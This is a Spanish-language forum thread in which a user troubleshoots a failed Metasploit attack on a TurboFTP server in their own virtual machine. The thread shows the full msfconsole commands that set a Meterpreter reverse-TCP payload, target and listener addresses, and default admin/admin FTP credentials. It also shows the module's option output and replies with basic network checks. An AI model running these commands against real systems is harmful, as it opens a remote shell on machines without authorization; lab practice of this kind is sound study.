Hola gente,
Tengo un servidor ftp vulnerable en una máquina virtual.
Cuando ejecuto el exploit desde metasploit me dá el siguiente error:
msf > use exploit/windows/ftp/turboftp_port
msf exploit(turboftp_port) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(turboftp_port) > set RHOST 192.168.1.104
RHOST => 192.168.1.104
msf exploit(turboftp_port) > set LHOST 192.168.1.102
LHOST => 192.168.1.102
msf exploit(turboftp_port) > set LPORT 4444
LPORT => 4444
msf exploit(turboftp_port) > exploit
- Started reverse handler on 192.168.1.102:4444
- Automatically detecting the target
- Selected Target: Automatic
[-] Exploit failed [disconnected]: Errno::ECONNRESET Connection reset by peer
msf exploit(turboftp_port) >
Alguien puede ayudarme a resolverlo?
Grs
Saludos,
Tienes conexion a la maquina virtual, es decir puedes hacer ping?
Que tal el firewall?
Firewall desactivado y conexión correcta! :-\
Pero el exploit no funciona!
Dale un show options desde "msf" y comparte la salida.
Saludos.
Enviado desde mi iPhone utilizando Tapatalk
(http://file:///root/Escritorio/win.png)
Module options (exploit/windows/ftp/turboftp_port):
Name Current Setting Required Description
---- --------------- -------- -----------
FTPPASS admin no The password for the specified username
FTPUSER admin no The username to authenticate as
RHOST 192.168.1.106 yes The target address
RPORT 21 yes The target port
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: , , seh, thread, process, none)
LHOST 192.168.1.102 yes The listen address
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic
msf exploit(turboftp_port) >
msf exploit(turboftp_port) > exploit
- Started reverse handler on 192.168.1.102:4444
- Automatically detecting the target
- Selected Target: Windows Universal TurboFtp 1.30.826[/b]
msf exploit(turboftp_port) >